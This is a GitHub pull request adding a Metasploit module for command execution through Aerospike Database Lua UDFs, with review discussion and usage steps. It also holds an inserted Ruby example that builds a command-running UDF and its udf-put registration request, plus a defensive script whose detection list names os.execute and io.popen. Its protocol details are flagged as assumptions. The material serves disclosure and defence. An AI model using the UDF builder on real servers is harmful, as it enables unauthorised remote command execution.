Add Aerospike Database UDF Lua Code Execution exploit #14466
Conversation
FYI @b4ny4n

Looks good! @bcoles - Just one note on the description: the vulnerability was in allowing io.popen calls.

Both

Interesting - on 4.9.0.5 I was unable to get os.execute to fire - I'll revisit - thanks!
The module works on your 4.9.0.5 docker image. I didn't bother to investigate why, but my guess is that your Python exploit defines a proper function, whereas I shoved
As it happens, I found your exploit on exploit-db before looking at your writeup or GitHub. The example Lua code
Edit: test on the docker image:
Yeah, that's really interesting! There must have been partial checks based on assumptions related to the UDF registering... I really like this approach as it doesn't need any of the dependencies, etc. Care if I link to it in my post?

Not at all. Go for it. I guess there's some useful context in this thread if you or someone else wants to investigate further. This module took longer to develop than anticipated, largely due to developing reliable cleanup (as per code comments) so I'm kinda over it, but there's certainly more areas for investigation. For reference, here's the result of testing on a patched version:
Tested successfully against versions

Release Notes
New module
Vulnerable Application

Aerospike Database versions before 5.1.0.3 permitted user-defined functions (UDF) to call the os.execute Lua function.

This module creates a UDF utilising this function to execute arbitrary operating system commands with the privileges of the user running the Aerospike service.

This module does not support authentication; however, Aerospike Database Community Edition does not enable authentication by default.

This module has been tested successfully on Ubuntu with Aerospike Database Community Edition versions 4.9.0.5, 4.9.0.11 and 5.0.0.10.
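The following is an added example, written for this review and not taken from the module, the PR or the Python exploit discussed above. It shows the shape of a Lua UDF that reaches the operating system (an os.execute variant and an io.popen variant that returns the command's output, both wrapped in a named function as the thread recommends) and how such a file is framed for registration over Aerospike's info protocol. The framing and the udf-put parameter syntax are my understanding of the protocol (version byte 2, type byte 1 for info, 6-byte big-endian payload size, newline-terminated commands) and are assumptions, as are the function name `run` and the use of `content-len` as a byte count. Nothing here opens a socket; it only builds and parses bytes.

```ruby
# Added example: Lua UDF construction and Aerospike info-protocol framing.
# Not part of the Metasploit module; offline only (no network I/O).
require 'base64'

# Build a Lua UDF that executes `cmd`. With capture_output: true the UDF uses
# io.popen and returns stdout to the caller; otherwise os.execute is used and
# only the exit status comes back. The function name `run` is an assumption.
def build_udf(cmd, capture_output: false)
  # Escape backslashes and double quotes so the command survives as one Lua string literal.
  lua_cmd = cmd.gsub(/["\\]/) { |c| "\\#{c}" }
  if capture_output
    <<~LUA
      -- executes the command and returns its stdout to the caller
      function run(rec)
        local p = io.popen("#{lua_cmd}")
        local out = p:read("*a")
        p:close()
        return out
      end
    LUA
  else
    <<~LUA
      -- executes the command; only the exit status is returned
      function run(rec)
        return os.execute("#{lua_cmd}")
      end
    LUA
  end
end

# Info-protocol header, as I understand it (assumption, not from the page):
# 1 byte protocol version (2), 1 byte message type (1 = info),
# 6 byte big-endian payload size, then the newline-terminated command(s).
AS_PROTO_VERSION = 2
AS_INFO_TYPE = 1

def info_request(command)
  payload = "#{command}\n".b
  size48 = [payload.bytesize].pack('Q>')[2, 6]   # low 6 bytes of a 64-bit big-endian size
  [AS_PROTO_VERSION, AS_INFO_TYPE].pack('CC') + size48 + payload
end

# udf-put / udf-remove command strings (parameter names as used by asinfo; assumption).
def udf_put_command(filename, lua)
  "udf-put:filename=#{filename};content=#{Base64.strict_encode64(lua)};" \
    "content-len=#{lua.bytesize};udf-type=LUA;"
end

def udf_remove_command(filename)
  "udf-remove:filename=#{filename};"
end

# Decode a framed request, e.g. from a packet capture, back into its parts.
def parse_info_request(bytes)
  version, type = bytes.unpack('CC')
  size = bytes[2, 6].unpack('C6').inject(0) { |acc, b| (acc << 8) | b }
  { version: version, type: type, size: size, payload: bytes[8, size] }
end

if __FILE__ == $PROGRAM_NAME
  lua = build_udf('id > /tmp/aerospike_udf_test')
  req = info_request(udf_put_command('example.lua', lua))
  puts lua
  puts "udf-put request: #{req.bytesize} bytes, header #{req[0, 8].unpack1('H*')}"
  puts "cleanup command: #{udf_remove_command('example.lua')}"
end
```

The udf-remove command is the counterpart the cleanup discussed in the thread needs: a registered UDF stays on disk under the server's UDF directory until it is removed, so an exploit that registers one and crashes out leaves an obvious artifact.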
Verification Steps

1. Download a vulnerable version of Aerospike Database Community Edition from:
2. Decompress the compressed .tgz software installer archive file:
3. Install:
4. Start the aerospike service:
5. In msfconsole, run:
   use exploit/linux/misc/aerospike_database_udf_cmd_exec
   set RHOSTS [IP]
   set target [target]
   set payload [payload]
   set LHOST [IP]
   exploit
Options

UDF_DIRECTORY
Directory where Lua UDF files are stored (Default: /opt/aerospike/usr/udf/lua/)

Scenarios

Aerospike Database Community Edition version 5.0.0.10 on Ubuntu 20.04 (x64)
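As an added example for the defensive side of the UDF_DIRECTORY option above (my own code, not part of the module or of Aerospike), the script below audits the on-disk Lua UDF directory for calls that let a UDF escape the database process. os.execute and io.popen are the two calls discussed in this thread; the other names in the list are my own additions of Lua library calls a record UDF has no reason to use, not a statement of what Aerospike's fix blocks. The sample UDF files are constructed in a temporary directory so the audit runs offline.

```ruby
# Added example: audit a directory of Lua UDFs for OS-reaching calls.
# Run against UDF_DIRECTORY (default /opt/aerospike/usr/udf/lua/) on a host you manage.
require 'tmpdir'

# os.execute and io.popen come from the thread; the rest are assumptions about
# what a legitimate record UDF should never need.
SUSPICIOUS_LUA_CALLS = %w[os.execute io.popen os.remove os.rename os.getenv
                          io.open loadstring load dofile require].freeze

# Matches `os[` / `io[` table indexing, the usual way to hide os.execute as os["execute"].
INDEXED_ACCESS = /(?<![\w.])(os|io)\s*\[/.freeze

# Returns { "file.lua" => [[line_no, call_name, stripped_line], ...] } for every
# *.lua file in `dir` that contains a listed call outside a line comment.
def audit_udf_dir(dir)
  findings = {}
  Dir.glob(File.join(dir, '*.lua')).sort.each do |path|
    hits = []
    File.foreach(path).with_index(1) do |line, no|
      code = line.sub(/--.*$/, '')   # drop Lua line comments (assumes no "--" inside string literals)
      SUSPICIOUS_LUA_CALLS.each do |call|
        # call followed by "(", a quoted string or "[[" long string, not preceded by a name character
        next unless code.match?(/(?<![\w.])#{Regexp.escape(call)}\s*[("'\[]/)

        hits << [no, call, line.strip]
      end
      hits << [no, 'indexed os/io access', line.strip] if code.match?(INDEXED_ACCESS)
    end
    findings[File.basename(path)] = hits unless hits.empty?
  end
  findings
end

# Constructed sample UDFs (not real captures) so the audit can be exercised offline.
def demo
  Dir.mktmpdir do |dir|
    File.write(File.join(dir, 'ok.lua'), "function count(rec)\n  return 1\nend\n")
    File.write(File.join(dir, 'backdoor.lua'),
               "-- os.execute in a comment is fine\nfunction run(rec)\n  return os.execute(\"id\")\nend\n")
    File.write(File.join(dir, 'sneaky.lua'), "local f = io.popen 'id'\nlocal g = os[\"execute\"]\n")
    audit_udf_dir(dir)
  end
end

if __FILE__ == $PROGRAM_NAME
  dir = ARGV[0]
  results = dir ? audit_udf_dir(dir) : demo
  results.each do |file, hits|
    hits.each { |no, call, text| puts "#{file}:#{no}: #{call}: #{text}" }
  end
  puts 'no suspicious UDFs found' if results.empty?
end
```

A file that trips the audit is not proof of compromise (an operator may have written it), but on a server that should only hold aggregation UDFs any hit is worth correlating with the udf-put timestamps in the server log and with the file's mtime.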